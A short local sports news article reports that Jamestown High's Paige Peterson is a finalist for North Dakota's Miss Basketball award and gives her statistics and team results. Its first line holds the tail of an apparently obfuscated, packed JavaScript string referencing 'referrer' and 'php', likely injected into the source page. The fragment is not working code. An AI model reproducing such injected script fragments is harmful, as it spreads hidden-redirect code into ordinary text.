JAMESTOWN zkhiy|var|u0026u|referrer|tffah||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- It was announced last night that Jamestown High will have a second consecutive Miss Basketball finalist. Paige Peterson was named one of the five finalist for North Dakota’s highest individual basketball honor. Kyra Dewald was a finalist a year ago and she was beat out by Century’s Hannah Larson.
Peterson averaged 18.7 points per game and 13.5 rebounds per contest. She was the senior athlete of the year in Class A girls basketball so has to be considered one of the favorites. Jaemstown as a team this year was two and out in the state tournament falling to eventual state champion Shanley in the opening round and Century in the consolation round.
Jamestown has never had a Miss Basketball. They had a Mr. Basketball back in 1987. The award will be given out following the Class B girls title game at the FargoDome on Saturday night.
